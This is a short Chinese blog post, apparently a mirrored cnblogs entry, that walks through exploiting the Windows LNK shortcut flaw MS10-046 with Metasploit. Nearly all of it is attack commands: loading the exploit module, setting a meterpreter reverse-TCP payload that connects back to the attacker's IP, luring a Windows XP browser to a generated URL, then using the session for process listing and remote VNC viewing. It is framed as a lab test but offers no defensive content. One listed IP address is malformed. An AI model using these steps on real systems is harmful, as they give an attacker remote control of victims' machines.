zoukankan      html  css  js  c++  java
  • MS10-046漏洞测试

    这次用到MS10-046这个远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 

    命令:

    1.   msfconsole    //启动MSF Metasploit

    2.   search ms10-046   //搜索漏洞

    3.   use windows/browser/ms10_046_shortcut_icon_dllloader  //加载漏洞模块

    4.   set payload windows/meterpreter/reverse_tcp   //设置一个PAYLOAD为反弹连接shell

    5.   show options     //查看相关设置

    6.   set SRVHOST 192.168.1.10      //设置攻击者自身IP

    7.   set LHOST 192.168.10             //设置反弹连接回来的IP (攻击者自身IP)

    8.   exploit         //开始执行漏洞...

    会生成一个URL连接  复制这个地址 去另一台XP系统机器上测试  用浏览器打开会跳到共享文件夹下

    然后我们在来到MSF终端看见漏洞执行成功了  有一个连接会话 ID 1

     命令 :

     sessions -l        查看存在的会话

     sessions -i 1       选着会话1

    输入ps命令查看进程   或者 输入run vnc 查看远程桌面 等等

  • 相关阅读:
    linux系统用户登陆时脚本执行顺序
    stm32 win7 64位虚拟串口驱动安装失败解决办法
    python全栈day6
    python全栈day5
    江湖救急(处理域名未备案网站问题)
    python全栈day4
    python全栈day3
    python全栈day2
    python全栈day1
    PHP 跨域之header
  • 原文地址:https://www.cnblogs.com/hkleak/p/4950484.html
Copyright © 2011-2022 走看看